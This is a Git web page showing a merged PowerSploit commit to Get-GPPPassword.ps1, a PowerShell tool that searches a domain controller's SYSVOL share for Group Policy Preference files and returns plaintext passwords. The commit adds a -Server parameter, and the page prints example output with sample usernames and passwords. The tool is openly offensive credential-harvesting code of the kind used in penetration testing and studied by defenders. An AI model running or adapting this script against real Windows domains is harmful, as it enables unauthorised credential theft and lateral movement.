Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge pull request #168 from linuz/master 

Added ability to specify domain controller to search (-Server parameter)
This commit is contained in:
HarmJ0y 2016-07-19 12:55:22 -07:00 committed by GitHub
parent 0cff698b35 87630cac63
commit 869badc7f1
1 changed files with 30 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
Exfiltration/Get-GPPPassword.ps1
View File

@ -12,7 +12,12 @@ function Get-GPPPassword {
.DESCRIPTION .DESCRIPTION
Get-GPPPassword searches the domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords. Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
.PARAMETER Server
Specify the domain controller to search for.
Default's to the users current domain
.EXAMPLE .EXAMPLE
@ -42,6 +47,21 @@ function Get-GPPPassword {
UserNames : {DEMO\Administrator, admin} UserNames : {DEMO\Administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
.EXAMPLE
PS C:\> Get-GPPPassword -Server EXAMPLE.COM
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml
.EXAMPLE .EXAMPLE
PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
@ -63,7 +83,11 @@ function Get-GPPPassword {
#> #>
[CmdletBinding()] [CmdletBinding()]
Param () Param (
[ValidateNotNullOrEmpty()]
[String]
$Server = $Env:USERDNSDOMAIN
)
#Some XML issues between versions #Some XML issues between versions
Set-StrictMode -Version 2 Set-StrictMode -Version 2
@ -109,7 +133,7 @@ function Get-GPPPassword {
function Get-GPPInnerFields { function Get-GPPInnerFields {
[CmdletBinding()] [CmdletBinding()]
Param ( Param (
$File $File
) )
try { try {
@ -204,10 +228,10 @@ function Get-GPPPassword {
if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
throw 'Machine is not a domain member or User is not a member of the domain.' throw 'Machine is not a domain member or User is not a member of the domain.'
} }
#discover potential files containing passwords ; not complaining in case of denied access to a directory #discover potential files containing passwords ; not complaining in case of denied access to a directory
Write-Verbose 'Searching the DC. This could take a while.' Write-Verbose "Searching \\$Server\SYSVOL. This could take a while."
$XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' $XMlFiles = Get-ChildItem -Path "\\$Server\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'
if ( -not $XMlFiles ) {throw 'No preference files found.'} if ( -not $XMlFiles ) {throw 'No preference files found.'}